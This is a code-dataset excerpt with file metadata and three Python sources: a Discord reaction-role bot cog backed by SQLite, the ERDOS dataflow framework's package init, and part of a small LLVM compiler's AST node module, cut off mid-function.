| 33.155556 | 203 | 0.578514 | 1,186 | 10,444 | 4.840641 | 0.215008 | 0.038321 | 0.029612 | 0.05034 | 0.127156 | 0.06201 | 0.048772 | 0.048772 | 0.035882 | 0 | 0 | 0.010108 | 0.317982 | 10,444 | 314 | 204 | 33.261147 | 0.795873 | 0.188051 | 0 | 0.110465 | 0 | 0 | 0.050192 | 0.003338 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034884 | false | 0 | 0.05814 | 0 | 0.133721 | 0.005814 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a106d05012e4ff5dbc04ccdc03a0e70f7b8fee | 4,669 | py | Python | cogs/rr.py | D3monEmper0r/CA-Discord-Bot | 1d38e00582cd0ea84af72a39daedc963256fd57a | [
"MIT"
] | null | null | null | cogs/rr.py | D3monEmper0r/CA-Discord-Bot | 1d38e00582cd0ea84af72a39daedc963256fd57a | [
"MIT"
] | 1 | 2021-03-26T15:41:07.000Z | 2021-03-26T15:41:07.000Z | cogs/rr.py | D3monEmper0r/CA-Discord-Bot | 1d38e00582cd0ea84af72a39daedc963256fd57a | [
"MIT"
] | null | null | null | ##### Imports #####
import discord
import sqlite3
from .__init__ import c
from discord.ext import commands
def create(db):
    """Create the reactionRole table in the given SQLite database if absent."""
    ddl = """CREATE TABLE IF NOT EXISTS
    reactionRole(role TEXT PRIMARY KEY, emote TEXT UNIQUE)"""
    connection = sqlite3.connect(db)
    cursor = connection.cursor()
    cursor.execute(ddl)
    connection.commit()
    connection.close()
def fill(db, role, emote):
    """Insert a (role, emote) mapping into the reactionRole table.

    Uses a parameterized query instead of f-string interpolation, which was
    open to SQL injection and broke on values containing double quotes.
    str() preserves the old behavior of stringifying non-string arguments.
    """
    conn = sqlite3.connect(db)
    c = conn.cursor()
    c.execute('INSERT INTO reactionRole VALUES (?, ?)', (str(role), str(emote)))
    conn.commit()
    conn.close()
def delete(db, role):
    """Remove the row for the given role from the reactionRole table.

    Uses a parameterized query instead of f-string interpolation, which was
    open to SQL injection and broke on values containing double quotes.
    """
    conn = sqlite3.connect(db)
    c = conn.cursor()
    c.execute('DELETE FROM reactionRole WHERE role = ?', (str(role),))
    conn.commit()
    conn.close()
def data(db):
    """Return every (role, emote) row stored in the reactionRole table."""
    connection = sqlite3.connect(db)
    rows = connection.execute('SELECT * FROM reactionRole').fetchall()
    connection.close()
    return rows
def search(db, emote):
    """Return the rows whose emote column matches ``emote``.

    Uses a parameterized query instead of f-string interpolation (SQL
    injection / quoting hazard).  ``str(emote)`` keeps the old behavior for
    non-string arguments such as discord PartialEmoji objects, which the
    f-string used to stringify implicitly.
    """
    conn = sqlite3.connect(db)
    c = conn.cursor()
    c.execute('SELECT * FROM reactionRole WHERE emote = ?', (str(emote),))
    result = c.fetchall()
    conn.close()
    return(result)
class ReactRole(commands.Cog):
    """Cog implementing reaction-role assignment backed by a SQLite table."""

    ##### Initalization #####
    def __init__(self, client):
        self.client = client

    ##### events #####
    @commands.Cog.listener()
    async def on_raw_reaction_add(self, payload):
        """Grant the role mapped to the emoji the member reacted with."""
        reactUser = payload.member
        g = self.client.get_guild(c.serverId)
        emoji = payload.emoji
        tmp = search(c.DB, emoji)[0][0]
        # Bug fix: `r` was previously unbound (NameError) whenever no role
        # mention matched the stored value.
        r = None
        for role in await g.fetch_roles():
            if role.mention == tmp:
                r = role
        if r != None and payload.channel_id == c.reactRoleId:
            if reactUser != self.client.user:
                await reactUser.add_roles(r)

    @commands.Cog.listener()
    async def on_raw_reaction_remove(self, payload):
        """Remove the role mapped to the emoji whose reaction was removed."""
        reactUser = discord.utils.get(self.client.get_all_members(), id=payload.user_id)
        g = self.client.get_guild(c.serverId)
        emoji = payload.emoji
        tmp = search(c.DB, emoji)[0][0]
        r = None  # see on_raw_reaction_add: avoid NameError when no match
        for role in await g.fetch_roles():
            if role.mention == tmp:
                r = role
        if r != None and payload.channel_id == c.reactRoleId:
            if reactUser != self.client.user:
                await reactUser.remove_roles(r)

    ##### commands #####
    @commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
    @commands.command()
    async def rrCreate(self, ctx):
        """Create the backing table and post the reaction-role message."""
        create(c.DB)
        await ctx.channel.purge(limit = 1)
        embed = discord.Embed(title='React to give yourself a role.', description='', color=0xa0089b)
        await ctx.send(embed=embed)

    @commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
    @commands.command()
    async def rrAdd(self, ctx, *, reactRole):
        """Store a "<role mention> <emoji>" mapping in the database."""
        await ctx.channel.purge(limit = 1)
        g = self.client.get_guild(c.serverId)
        role = reactRole.split(' ')[0]
        emoji = reactRole.split(' ')[1]
        fill(c.DB, role, emoji)

    @commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
    @commands.command()
    async def rrUpdate(self, ctx):
        """Re-render the reaction-role message and its reactions from the DB."""
        await ctx.channel.purge(limit = 1)
        channel = await self.client.fetch_channel(c.reactRoleId)
        message = await channel.fetch_message(c.reactMsgId)
        desc = ''
        for item in data(c.DB):
            desc += item[0] + ': ' + item[1] + '\n'
        embed = discord.Embed(title='React to give yourself a role.', description=desc, color=0xa0089b)
        await message.edit(embed=embed)
        await message.clear_reactions()
        for item in data(c.DB):
            await message.add_reaction(item[1])

    @commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
    @commands.command()
    async def rrRemove(self, ctx, role):
        """Delete a role's mapping from the database."""
        await ctx.channel.purge(limit = 1)
        g = self.client.get_guild(c.serverId)
        delete(c.DB, role)

    @commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
    @commands.command(aliases=['e'])
    async def get_e(self, ctx):
        """Debug helper: send every custom emoji of the guild."""
        g = self.client.get_guild(c.serverId)
        for e in await g.fetch_emojis():
            await ctx.send(e)

    @commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
    @commands.command(aliases=['r'])
    async def get_r(self, ctx, role):
        """Debug helper: send the id of the guild role whose mention matches."""
        g = self.client.get_guild(c.serverId)
        print(role)
        for r in await g.fetch_roles():
            print('CA role: ', r.mention)
            if r.mention == role:
                await ctx.send(r.id)
##### Finalize and run #####
def setup(client):
    """Entry point used by discord.py to register this cog on the bot."""
    cog = ReactRole(client)
    client.add_cog(cog)
41a3c225eedd6acf9dfa7630da6b90b21ff018d4 | 18,539 | py | Python | python/erdos/__init__.py | objorkman/erdos | 13b3be477d6674e9e377a56dec484f80ba41e915 | [
"Apache-2.0"
] | null | null | null | python/erdos/__init__.py | objorkman/erdos | 13b3be477d6674e9e377a56dec484f80ba41e915 | [
"Apache-2.0"
] | null | null | null | python/erdos/__init__.py | objorkman/erdos | 13b3be477d6674e9e377a56dec484f80ba41e915 | [
"Apache-2.0"
] | null | null | null | import logging
import multiprocessing as mp
import signal
import sys
from functools import wraps
from typing import Optional, Tuple, Type
import erdos.context
import erdos.internal as _internal
import erdos.operator
import erdos.utils
from erdos.message import Message, WatermarkMessage
from erdos.profile import Profile
from erdos.streams import (
ExtractStream,
IngestStream,
LoopStream,
OperatorStream,
ReadStream,
Stream,
WriteStream,
)
from erdos.timestamp import Timestamp
# Counter of Python operators registered so far.  Each operator gets its own
# node id (1-indexed; node 0 is reserved for the driver process).
_num_py_operators = 0

# Set the top-level logger for ERDOS logging.
# Users can change the logging level to the required level by calling setLevel
# erdos.logger.setLevel(logging.DEBUG)
FORMAT = "%(asctime)s.%(msecs)03d %(name)s %(levelname)s: %(message)s"
DATE_FORMAT = "%Y-%m-%d,%H:%M:%S"
formatter = logging.Formatter(FORMAT, datefmt=DATE_FORMAT)
default_handler = logging.StreamHandler(sys.stderr)
default_handler.setFormatter(formatter)
logger = logging.getLogger(__name__)
logger.addHandler(default_handler)
logger.setLevel(logging.WARNING)
# Avoid duplicate records when the root logger also has handlers attached.
logger.propagate = False
def connect_source(
    op_type: Type[erdos.operator.Source],
    config: erdos.operator.OperatorConfig,
    *args,
    **kwargs,
) -> OperatorStream:
    """Registers a :py:class:`.Source` operator to the dataflow
    graph, and returns the :py:class:`OperatorStream` that the operator will
    write the data on.

    Args:
        op_type: The :py:class:`.Source` operator that needs to
            be added to the graph.
        config: Configuration details required by the operator.
        *args: Arguments passed to the operator during initialization.
        **kwargs: Keyword arguments passed to the operator during
            initialization.

    Returns:
        An :py:class:`OperatorStream` corresponding to the
        :py:class:`WriteStream` made available to :py:meth:`.Source.run`.
    """
    if not issubclass(op_type, erdos.operator.Source):
        raise TypeError("{} must subclass erdos.operator.Source".format(op_type))
    if op_type.run.__code__.co_code == erdos.operator.Source.run.__code__.co_code:
        # `run` was not overridden, so this source will produce no data.
        # (logger.warn is a deprecated alias of logger.warning.)
        logger.warning(
            "The operator {} does not " "implement the `run` method.".format(op_type)
        )
    # 1-index operators because node 0 is preserved for the current process,
    # and each node can only run 1 python operator.
    global _num_py_operators
    _num_py_operators += 1
    node_id = _num_py_operators
    logger.debug(
        "Connecting operator #{num} ({name}) to the graph.".format(
            num=node_id, name=config.name
        )
    )
    internal_stream = _internal.connect_source(op_type, config, args, kwargs, node_id)
    return OperatorStream(internal_stream)
def connect_sink(
    op_type: Type[erdos.operator.Sink],
    config: erdos.operator.OperatorConfig,
    read_stream: Stream,
    *args,
    **kwargs,
):
    """Registers a :py:class:`.Sink` operator to the dataflow
    graph.

    Args:
        op_type: The :py:class:`.Sink` operator that needs to
            be added to the graph.
        config: Configuration details required by the operator.
        read_stream: The :py:class:`Stream` instance from where the operator
            reads its data.
        *args: Arguments passed to the operator during initialization.
        **kwargs: Keyword arguments passed to the operator during
            initialization.
    """
    if not issubclass(op_type, erdos.operator.Sink):
        raise TypeError("{} must subclass erdos.operator.Sink".format(op_type))
    if not isinstance(read_stream, Stream):
        raise TypeError("{} must subclass `Stream`.".format(read_stream))
    if (
        op_type.run.__code__.co_code == erdos.operator.Sink.run.__code__.co_code
        and op_type.on_data.__code__.co_code
        == erdos.operator.Sink.on_data.__code__.co_code
        and op_type.on_watermark.__code__.co_code
        == erdos.operator.Sink.on_watermark.__code__.co_code
    ):
        # None of the hooks were overridden, so this sink can do nothing.
        # (logger.warn is a deprecated alias of logger.warning.)
        logger.warning(
            "The operator {} does not implement any of the "
            "`run`, `on_data` or `on_watermark` methods.".format(op_type)
        )
    # 1-index operators because node 0 is preserved for the current process,
    # and each node can only run 1 python operator.
    global _num_py_operators
    _num_py_operators += 1
    node_id = _num_py_operators
    logger.debug(
        "Connecting operator #{num} ({name}) to the graph.".format(
            num=node_id, name=config.name
        )
    )
    _internal.connect_sink(
        op_type, config, read_stream._internal_stream, args, kwargs, node_id
    )
def connect_one_in_one_out(
    op_type: Type[erdos.operator.OneInOneOut],
    config: erdos.operator.OperatorConfig,
    read_stream: Stream,
    *args,
    **kwargs,
) -> OperatorStream:
    """Registers a :py:class:`.OneInOneOut` operator to the dataflow graph that
    receives input from the given :code:`read_stream`, and returns the
    :py:class:`OperatorStream` that the operator will write the data on.

    Args:
        op_type: The :py:class:`.OneInOneOut` operator that needs to be added
            to the graph.
        config: Configuration details required by the operator.
        read_stream: The :py:class:`Stream` instance from where the operator
            reads its data.
        *args: Arguments passed to the operator during initialization.
        **kwargs: Keyword arguments passed to the operator during
            initialization.

    Returns:
        An :py:class:`OperatorStream` corresponding to the
        :py:class:`WriteStream` made available to :py:meth:`.OneInOneOut.run`,
        or to the operator's callbacks via the
        :py:class:`.OneInOneOutContext`.
    """
    if not issubclass(op_type, erdos.operator.OneInOneOut):
        raise TypeError("{} must subclass erdos.operator.OneInOneOut".format(op_type))
    if not isinstance(read_stream, Stream):
        raise TypeError("{} must subclass `Stream`.".format(read_stream))
    if (
        op_type.run.__code__.co_code == erdos.operator.OneInOneOut.run.__code__.co_code
        and op_type.on_data.__code__.co_code
        == erdos.operator.OneInOneOut.on_data.__code__.co_code
        and op_type.on_watermark.__code__.co_code
        == erdos.operator.OneInOneOut.on_watermark.__code__.co_code
    ):
        # None of the hooks were overridden, so this operator can do nothing.
        # (logger.warn is a deprecated alias of logger.warning.)
        logger.warning(
            "The operator {} does not implement any of the "
            "`run`, `on_data` or `on_watermark` methods.".format(op_type)
        )
    # 1-index operators because node 0 is preserved for the current process,
    # and each node can only run 1 python operator.
    global _num_py_operators
    _num_py_operators += 1
    node_id = _num_py_operators
    logger.debug(
        "Connecting operator #{num} ({name}) to the graph.".format(
            num=node_id, name=config.name
        )
    )
    internal_stream = _internal.connect_one_in_one_out(
        op_type, config, read_stream._internal_stream, args, kwargs, node_id
    )
    return OperatorStream(internal_stream)
def connect_two_in_one_out(
    op_type: Type[erdos.operator.TwoInOneOut],
    config: erdos.operator.OperatorConfig,
    left_read_stream: Stream,
    right_read_stream: Stream,
    *args,
    **kwargs,
) -> OperatorStream:
    """Registers a :py:class:`.TwoInOneOut` operator to the
    dataflow graph that receives input from the given :code:`left_read_stream`
    and :code:`right_read_stream`, and returns the :py:class:`OperatorStream`
    that the operator sends messages on.

    Args:
        op_type: The :py:class:`.TwoInOneOut` operator to add
            to the graph.
        config: Configuration details required by the operator.
        left_read_stream: The first :py:class:`Stream` instance from where the
            operator reads its data.
        right_read_stream: The second :py:class:`Stream` instance from where
            the operator reads its data.
        *args: Arguments passed to the operator during initialization.
        **kwargs: Keyword arguments passed to the operator during
            initialization.

    Returns:
        An :py:class:`OperatorStream` corresponding to the
        :py:class:`WriteStream` made available to :py:meth:`.TwoInOneOut.run`,
        or to the operator's callbacks via the
        :py:class:`.TwoInOneOutContext`.
    """
    if not issubclass(op_type, erdos.operator.TwoInOneOut):
        raise TypeError("{} must subclass erdos.operator.TwoInOneOut".format(op_type))
    if not isinstance(left_read_stream, Stream):
        raise TypeError("{} must subclass `Stream`.".format(left_read_stream))
    if not isinstance(right_read_stream, Stream):
        raise TypeError("{} must subclass `Stream`.".format(right_read_stream))
    if (
        op_type.run.__code__.co_code == erdos.operator.TwoInOneOut.run.__code__.co_code
        and op_type.on_left_data.__code__.co_code
        == erdos.operator.TwoInOneOut.on_left_data.__code__.co_code
        and op_type.on_right_data.__code__.co_code
        == erdos.operator.TwoInOneOut.on_right_data.__code__.co_code
        and op_type.on_watermark.__code__.co_code
        == erdos.operator.TwoInOneOut.on_watermark.__code__.co_code
    ):
        # None of the hooks were overridden, so this operator can do nothing.
        # (logger.warn is a deprecated alias of logger.warning.)
        logger.warning(
            "The operator {} does not implement any of the `run`, "
            "`on_left_data`, `on_right_data` or `on_watermark` "
            "methods.".format(op_type)
        )
    # 1-index operators because node 0 is preserved for the current process,
    # and each node can only run 1 python operator.
    global _num_py_operators
    _num_py_operators += 1
    node_id = _num_py_operators
    logger.debug(
        "Connecting operator #{num} ({name}) to the graph.".format(
            num=node_id, name=config.name
        )
    )
    internal_stream = _internal.connect_two_in_one_out(
        op_type,
        config,
        left_read_stream._internal_stream,
        right_read_stream._internal_stream,
        args,
        kwargs,
        node_id,
    )
    return OperatorStream(internal_stream)
def connect_one_in_two_out(
    op_type: Type[erdos.operator.OneInTwoOut],
    config: erdos.operator.OperatorConfig,
    read_stream: Stream,
    *args,
    **kwargs,
) -> Tuple[OperatorStream, OperatorStream]:
    """Registers a :py:class:`.OneInTwoOut` operator to the dataflow graph that
    receives input from the given :code:`read_stream`, and returns the pair of
    :py:class:`OperatorStream` instances that the operator will write data on.

    Args:
        op_type: The :py:class:`.OneInTwoOut` operator that needs to be added
            to the graph.
        config: Configuration details required by the operator.
        read_stream: The :py:class:`Stream` instance from where the
            operator reads its data.
        *args: Arguments passed to the operator during initialization.
        **kwargs: Keyword arguments passed to the operator during
            initialization.

    Returns:
        A pair of :py:class:`OperatorStream` instances corresponding to the
        :py:class:`WriteStream` instances made available to
        :py:meth:`.OneInOneOut.run`, or to the operator's callbacks via the
        :py:class:`.OneInTwoOutContext`.
    """
    if not issubclass(op_type, erdos.operator.OneInTwoOut):
        raise TypeError("{} must subclass erdos.operator.OneInTwoOut".format(op_type))
    if not isinstance(read_stream, Stream):
        raise TypeError("{} must subclass `Stream`.".format(read_stream))
    if (
        op_type.run.__code__.co_code == erdos.operator.OneInTwoOut.run.__code__.co_code
        and op_type.on_data.__code__.co_code
        == erdos.operator.OneInTwoOut.on_data.__code__.co_code
        and op_type.on_watermark.__code__.co_code
        == erdos.operator.OneInTwoOut.on_watermark.__code__.co_code
    ):
        # None of the hooks were overridden, so this operator can do nothing.
        # (logger.warn is a deprecated alias of logger.warning.)
        logger.warning(
            "The operator {} does not implement any of the "
            "`run`, `on_data` or `on_watermark` methods.".format(op_type)
        )
    # 1-index operators because node 0 is preserved for the current process,
    # and each node can only run 1 python operator.
    global _num_py_operators
    _num_py_operators += 1
    node_id = _num_py_operators
    logger.debug(
        "Connecting operator #{num} ({name}) to the graph.".format(
            num=node_id, name=config.name
        )
    )
    left_stream, right_stream = _internal.connect_one_in_two_out(
        op_type, config, read_stream._internal_stream, args, kwargs, node_id
    )
    return OperatorStream(left_stream), OperatorStream(right_stream)
def reset():
    """Create a new dataflow graph.

    Note:
        A call to this function renders the previous dataflow graph unsafe to
        use.
    """
    global _num_py_operators
    logger.info("Resetting the default graph.")
    _num_py_operators = 0
    _internal.reset()
# TODO (Sukrit) : Should this be called a GraphHandle?
# What is the significance of the "Node" here?
class NodeHandle:
    """A handle to the dataflow graph returned by the :py:func:`run_async`
    function.

    The handle exposes functions to :py:func:`shutdown` the dataflow, or
    :py:func:`wait` for its completion.

    Note:
        This structure should not be initialized by the users.
    """

    def __init__(self, py_node_handle, processes):
        self.py_node_handle = py_node_handle
        self.processes = processes

    def shutdown(self):
        """Shuts down the dataflow."""
        logger.info("Shutting down other processes")
        for process in self.processes:
            process.terminate()
            process.join()
        logger.info("Shutting down node.")
        self.py_node_handle.shutdown_node()

    def wait(self):
        """Waits for the completion of all the operators in the dataflow"""
        for process in self.processes:
            process.join()
        logger.debug("Finished waiting for the dataflow graph processes.")
def run(graph_filename: Optional[str] = None, start_port: Optional[int] = 9000):
    """Instantiates and runs the dataflow graph.

    ERDOS will spawn 1 process for each python operator, and connect them via
    TCP.

    Args:
        graph_filename: The filename to which to write the dataflow graph
            as a DOT file.
        start_port: The port on which to start. The start port is the
            lowest port ERDOS will use to establish TCP connections between
            operators.
    """
    handle = run_async(graph_filename, start_port)
    logger.debug("Waiting for the dataflow to complete ...")
    handle.wait()
def _run_node(node_id, data_addresses, control_addresses):
    """Process target: run the dataflow node with the given id (blocking)."""
    _internal.run(node_id, data_addresses, control_addresses)
def run_async(
    graph_filename: Optional[str] = None, start_port: Optional[int] = 9000
) -> NodeHandle:
    """Instantiates and runs the dataflow graph asynchronously.

    ERDOS will spawn 1 process for each python operator, and connect them via
    TCP.

    Args:
        graph_filename: The filename to which to write the dataflow graph
            as a DOT file.
        start_port: The port on which to start. The start port is the
            lowest port ERDOS will use to establish TCP connections between
            operators.

    Returns:
        A :py:class:`.NodeHandle` that allows the driver to interface with the
        dataflow graph.
    """
    # One data address and one control address per node (driver + operators);
    # control ports are allocated directly after the block of data ports.
    data_addresses = [
        "127.0.0.1:{port}".format(port=start_port + i)
        for i in range(_num_py_operators + 1)
    ]
    control_addresses = [
        "127.0.0.1:{port}".format(port=start_port + len(data_addresses) + i)
        for i in range(_num_py_operators + 1)
    ]
    logger.debug("Running the dataflow graph on addresses: {}".format(data_addresses))

    # Fix for macOS where mulitprocessing defaults
    # to spawn() instead of fork() in Python 3.8+
    # https://docs.python.org/3/library/multiprocessing.html#contexts-and-start-methods
    # Warning: may lead to crashes
    # https://bugs.python.org/issue33725
    ctx = mp.get_context("fork")
    # One worker process per Python operator (nodes 1..N).
    processes = [
        ctx.Process(target=_run_node, args=(i, data_addresses, control_addresses))
        for i in range(1, _num_py_operators + 1)
    ]

    # Needed to shut down child processes
    def sigint_handler(sig, frame):
        for p in processes:
            p.terminate()
        sys.exit(0)

    signal.signal(signal.SIGINT, sigint_handler)

    for p in processes:
        p.start()

    # The driver must always be on node 0 otherwise ingest and extract streams
    # will break
    py_node_handle = _internal.run_async(
        0, data_addresses, control_addresses, graph_filename
    )

    return NodeHandle(py_node_handle, processes)
def profile(event_name, operator, event_data=None):
    """Return a :py:class:`Profile` context for the given event."""
    return Profile(event_name, operator, event_data)
def profile_method(**decorator_kwargs):
    """Decorator factory that wraps an operator method in an erdos profile
    span, recording the callback's timestamp as event data."""

    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            # Guard clause: only operator methods may be profiled.
            if not isinstance(args[0], erdos.operator.BaseOperator):
                raise TypeError("@erdos.profile can only be used on operator methods")
            operator_instance = args[0]
            if "event_name" in decorator_kwargs:
                event_name = decorator_kwargs["event_name"]
            else:
                # Set the event name to the operator name and the callback
                # name if it's not passed by the user.
                event_name = operator_instance.config.name + "." + func.__name__
            timestamp = None
            if len(args) > 1:
                if isinstance(args[1], Timestamp):
                    # The func is a watermark callback.
                    timestamp = args[1]
                elif isinstance(args[1], Message):
                    # The func is a message callback.
                    timestamp = args[1].timestamp
            with erdos.profile(
                event_name, operator_instance, event_data={"timestamp": str(timestamp)}
            ):
                return func(*args, **kwargs)

        return wrapper

    return decorator
# Names re-exported as the public API of the `erdos` package.
__all__ = [
    "Stream",
    "ReadStream",
    "WriteStream",
    "LoopStream",
    "IngestStream",
    "ExtractStream",
    "Profile",
    "Message",
    "WatermarkMessage",
    "Timestamp",
    "connect_source",
    "connect_sink",
    "connect_one_in_one_out",
    "connect_two_in_one_out",
    "connect_one_in_two_out",
    "reset",
    "run",
    "run_async",
    "profile_method",
    "NodeHandle",
]
| 34.847744 | 87 | 0.663089 | 2,358 | 18,539 | 5.000848 | 0.126378 | 0.022388 | 0.023745 | 0.017809 | 0.654003 | 0.629834 | 0.572676 | 0.538755 | 0.520353 | 0.490926 | 0 | 0.004936 | 0.246022 | 18,539 | 531 | 88 | 34.913371 | 0.838675 | 0.349426 | 0 | 0.348684 | 0 | 0.003289 | 0.14256 | 0.016302 | 0 | 0 | 0 | 0.001883 | 0 | 1 | 0.055921 | false | 0 | 0.046053 | 0.003289 | 0.134868 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a3f81d4c1f4c13d941abba84f2c1450266e8a1 | 7,951 | py | Python | compyler/node.py | Fogelman/compyler | 76c6ba12f264131b6a5d800dd40bb76fe3155900 | [
"MIT"
] | null | null | null | compyler/node.py | Fogelman/compyler | 76c6ba12f264131b6a5d800dd40bb76fe3155900 | [
"MIT"
] | null | null | null | compyler/node.py | Fogelman/compyler | 76c6ba12f264131b6a5d800dd40bb76fe3155900 | [
"MIT"
] | null | null | null |
from llvmlite import ir
from rply.token import BaseBox
from abc import ABC, abstractmethod
import operator as op
from compyler.symboltable import FunctionSymbol, SymbolTable
class Node(BaseBox, ABC):
    """Abstract AST node: a value plus a list of child nodes."""

    def __init__(self, value, children=None):
        self.value = value
        self.children = list() if children is None else children

    @abstractmethod
    def Evaluate(self, context):
        """Emit code for this node using the given compilation context."""
        pass
class Context(object):
    """Per-scope compilation state: symbol table, IR builder, module, a
    shared environment of global objects, and scope-local scratch values."""

    def __init__(self, st, builder, module, env=None):
        self.st = st
        self.builder = builder
        self.module = module
        # Bug fix: the default used to be the mutable `env=dict()`, which
        # is evaluated once and shared by every Context built without an
        # explicit env.  Callers passing env are unaffected.
        self.env = dict() if env is None else env
        self.local = dict()

    def new(self):
        """Return a child context: a fresh symbol table scoped under this
        one, sharing the builder, module and environment."""
        st = SymbolTable(parent=self.st)
        builder = self.builder
        module = self.module
        env = self.env
        return Context(st, builder, module, env)

    def declare(self, name):
        """Create an alloca in the entry BB of the current function."""
        int32 = ir.IntType(32)
        return self.builder.alloca(int32, name=name)
class UnOp(Node):
    """Unary operation node; ``value`` selects the operator symbol."""

    op_map = {
        '+': lambda builder, x: x,
        '-': lambda builder, x: builder.neg(x, "unoptmp"),
        '~': lambda builder, x: builder.not_(x, "unoptmp"),
        'not': lambda builder, x: builder.not_(x, "unoptmp"),
    }

    def Evaluate(self, context):
        operand = self.children[0].Evaluate(context)
        return self.op_map[self.value](context.builder, operand)
class BinOp(Node):
    """Binary operation node; ``value`` selects the operator symbol and the
    two children are the left and right operand expressions."""

    # Maps each operator token to a function emitting the corresponding LLVM
    # instruction.  NOTE(review): '/' and '//' both lower to signed integer
    # division (sdiv), so '/' truncates -- presumably the language is
    # integer-only (everything here is i32); confirm this is intended.
    op_map = {
        '+': lambda builder, x, y: builder.add(x, y, "optmp"),
        '-': lambda builder, x, y: builder.sub(x, y, "optmp"),
        '*': lambda builder, x, y: builder.mul(x, y, "optmp"),
        '^': lambda builder, x, y: builder.xor(x, y, "optmp"),
        '/': lambda builder, x, y: builder.sdiv(x, y, "optmp"),
        '//': lambda builder, x, y: builder.sdiv(x, y, "optmp"),
        '%': lambda builder, x, y: builder.srem(x, y, "optmp"),
        '&': lambda builder, x, y: builder.and_(x, y, "optmp"),
        '|': lambda builder, x, y: builder.or_(x, y, "optmp"),
        '<': lambda builder, x, y: builder.icmp_signed("<", x, y, "optmp"),
        '>': lambda builder, x, y: builder.icmp_signed(">", x, y, "optmp"),
        '<=': lambda builder, x, y: builder.icmp_signed("<=", x, y, "optmp"),
        '>=': lambda builder, x, y: builder.icmp_signed(">=", x, y, "optmp"),
        '==': lambda builder, x, y: builder.icmp_signed("==", x, y, "optmp"),
        '!=': lambda builder, x, y: builder.icmp_signed("!=", x, y, "optmp"),
        'and': lambda builder, x, y: builder.and_(x, y, "optmp"),
    }

    def Evaluate(self, context):
        # Left operand (children[0]) is evaluated before the right one.
        return self.op_map[self.value](context.builder, self.children[0].Evaluate(context), self.children[1].Evaluate(context))
class IntVal(Node):
    """Integer literal node; emits an i32 constant."""

    def Evaluate(self, context):
        return ir.Constant(ir.IntType(32), int(self.value))
class BoolVal(Node):
    """Boolean literal node; emits i32 1 for the string "True", else 0."""

    def Evaluate(self, context):
        flag = 1 if self.value == "True" else 0
        return ir.Constant(ir.IntType(32), flag)
class AnyVal(Node):
    """Wrapper node whose evaluation simply yields the stored value."""

    def Evaluate(self, context):
        return self.value
class NoOp(Node):
    """Placeholder node; evaluating it does nothing and returns None."""

    def Evaluate(self, context):
        return None
class Assignment(Node):
    """Assignment statement: store the evaluated child into the variable
    named by ``value``, allocating a stack slot on first use."""

    def Evaluate(self, context):
        slot = context.st.contains(self.value)
        if not slot:
            # First assignment in this scope: allocate a stack slot.
            slot = context.declare(self.value)
        result = self.children[0].Evaluate(context)
        context.builder.store(result, slot)
        context.st.set(self.value, slot)
class Identifier(Node):
    """Variable reference: load the current value from its stack slot."""

    def Evaluate(self, context):
        slot = context.st.get(self.value)
        return context.builder.load(slot)
class Print(Node):
    """Print statement: call the environment's printf with the evaluated
    child value, caching the casted format-string pointer per scope."""

    def Evaluate(self, context):
        int8 = ir.IntType(8).as_pointer()
        printf = context.env["printf"]
        ftm = context.env["ftm"]
        # Idiomatic membership test (was context.local.__contains__("print")).
        if "print" in context.local:
            arg = context.local["print"]
        else:
            # Cast the format-string global to i8* once per scope and cache it.
            arg = context.builder.bitcast(ftm, int8)
            context.local["print"] = arg
        result = self.children[0].Evaluate(context)
        context.builder.call(printf, [arg, result])
class If(Node):
    """Conditional statement node.

    children[0] is the condition expression, children[1] the then-block, and
    the optional children[2] the else-block.
    """

    def Evaluate(self, context):
        int32 = ir.IntType(32)
        condition = self.children[0].Evaluate(context)
        # Any non-zero condition value counts as true.
        pred = context.builder.icmp_signed(
            '!=', condition, ir.Constant(int32, 0))
        with context.builder.if_else(pred) as (then, otherwise):
            with then:
                self.children[1].Evaluate(context)
            with otherwise:
                # Else-branch is optional; emit it only when present.
                if len(self.children) > 2:
                    self.children[2].Evaluate(context)
class While(Node):
    """While-loop node: children[0] is the condition, children[1] the body.

    NOTE(review): the body is emitted *before* the condition check inside the
    loop block, so the body always runs at least once (do-while semantics) --
    confirm this matches the language's intended `while` semantics.
    """

    def Evaluate(self, context):
        int32 = ir.IntType(32)
        loop = context.builder.function.append_basic_block('loop')
        # Fall through from the current block into the loop block.
        context.builder.branch(loop)
        context.builder.position_at_start(loop)
        self.children[1].Evaluate(context)
        endcond = self.children[0].Evaluate(context)
        cmp = context.builder.icmp_signed(
            '!=', endcond, ir.Constant(int32, 0),
            'loopcond')
        after = context.builder.function.append_basic_block('afterloop')
        # Branch back to the loop head while the condition is non-zero.
        context.builder.cbranch(cmp, loop, after)
        context.builder.position_at_start(after)
class ReadLine(Node):
    """Read a line from stdin and interpret it as an integer.

    Note: this calls Python's input() directly, so the value is read when
    the node is evaluated rather than being lowered to IR.
    """

    def Evaluate(self, context):
        return int(input())
class Commands(Node):
    """Sequence of statements evaluated in order."""

    def Evaluate(self, context, check=False):
        for statement in self.children:
            statement.Evaluate(context)
        if check and self.children and isinstance(self.children[-1], Return):
            # Record that this block already ends in an explicit return.
            context.local["ret"] = ""

    def append(self, child):
        """Add one more statement to the end of the sequence."""
        self.children.append(child)
class FuncAssignment(Node):
    """Function definition node: ``value`` is the function name and the
    children are (argument-name list, body)."""

    def _create(self, context):
        """Declare the LLVM function, or reuse an existing forward
        declaration with a matching arity.  All parameters and the return
        value are i32."""
        int32 = ir.IntType(32)
        args, _ = self.children
        ty = ir.FunctionType(int32, [int32 for i in range(len(args))])
        if self.value in context.module.globals:
